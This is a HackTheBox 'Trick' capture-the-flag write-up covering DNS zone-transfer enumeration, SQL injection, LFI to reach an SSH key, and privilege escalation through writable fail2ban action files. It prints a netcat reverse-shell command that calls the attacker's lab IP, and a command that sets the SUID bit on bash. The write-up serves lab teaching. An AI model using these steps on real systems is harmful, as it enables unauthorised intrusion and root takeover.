CTF-Writeups/HackTheBox/Trick.md
2023-02-10 17:31:39 +03:00

5.9 KiB

HackThBox - Trick

NMAP

Nmap scan report for 10.129.85.201
Host is up (0.15s latency).
Not shown: 65531 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 61:ff:29:3b:36:bd:9d:ac:fb:de:1f:56:88:4c:ae:2d (RSA)
|   256 9e:cd:f2:40:61:96:ea:21:a6:ce:26:02:af:75:9a:78 (ECDSA)
|_  256 72:93:f9:11:58:de:34:ad:12:b5:4b:4a:73:64:b9:70 (ED25519)
25/tcp open  smtp?
|_smtp-commands: Couldn't establish connection on port 25
53/tcp open  domain  ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)
| dns-nsid: 
|_  bind.version: 9.11.5-P4-5.1+deb10u7-Debian
80/tcp open  http    nginx 1.14.2
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.2
|_http-title: Coming Soon - Start Bootstrap Theme
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80 (HTTP)

On the web page we see a bootstrap template which has nothing intersting

Fuzzing for files and directories it didn't found anything as well

PORT 53 (DNS)

Having dns service running we can try to see if we can query dns records or perform dns zone transfer for that we need a domain name, we can get the domain by performing a reverse dns lookup which resolve IP to domain name

https://book.hacktricks.xyz/network-services-pentesting/pentesting-dns

dig -x 10.10.11.166 @10.10.11.166

Having the trick.htb we can add this in hosts file

Now to enumerate further we can perform the dns zone transfer

This shows root.trick.htb subdomain but it doesn't take us anywhere, on performing zone transfer with axfr

We get another domain name preprod-payroll.trick.htb, so let's add this in hosts file as well

Visting this subdomain, we'll get a login page on which we can try default credentials

Which didn't worked, so next I tried sqli

That worked, so I tried running sqlmap but time-based blind so it's gonna take a lot of time in dumping the data

Foothold

Going back to the site we can see a GET parameter page fetching for pages, I tried to perform LFI on that parameter but it didn't worked

I tried running wfuzz against the parameter using LFI wordlist

Which didn't worked but the web app had sql injection in ton of places, on viewing employee details intercepting the request, we'll get a GET parameter id which also is vulnerable to sqli

It shows that it's boolean-blind as on the login page it was a time based sqli so with this we can perform LFI to read nginx vhost configuration file

This shows another subdomain preprod-marketing.trick.htb

Alternatively we can enumerate this subdomain by running wfuzz

This loads up another site, having nothing special other than the same GET parameter, so I tried running LFI wordlist here as well

This starts to give us some output on filterting the response

We have the username michael , we can try to see if we can access his .ssh folder for id_rsa

Privilege Escalation

Running sudo -l to check if we can run with sudo privileges

So we can restart the fail2ban service but we don't know exaclty what we need to edit, being in security group we can check what permissions this group has

We have write access to this folder which has configuration files for fail2ban

I found an article explaining how we can abuse fail2ban config file

https://youssef-ichioui.medium.com/abusing-fail2ban-misconfiguration-to-escalate-privileges-on-linux-826ad0cdafb7

For this we need to edit the actionban command in iptables-multiport.conf, so first let's copy this file in /tmp or other directory where we can edit it with a reverse shell

/usr/bin/nc 10.10.14.39 2222 -e /bin/bash

After editing the config file, move it back to the action.d folder and restart fail2ban service

Then start doing fail attempts on login, you'll get a reverse shell on your port

But our reverse shell connection dies and the reason behind this is, the ban duration lasts for 10 seconds and bans the host after the 5th attempt

Instead of getting a reverse shell we can just make bash a SUID with chmod +s /bin/bash

Performing the invalid login attempts on ssh will trigger the fail2ban on the 5th invalid attempt

References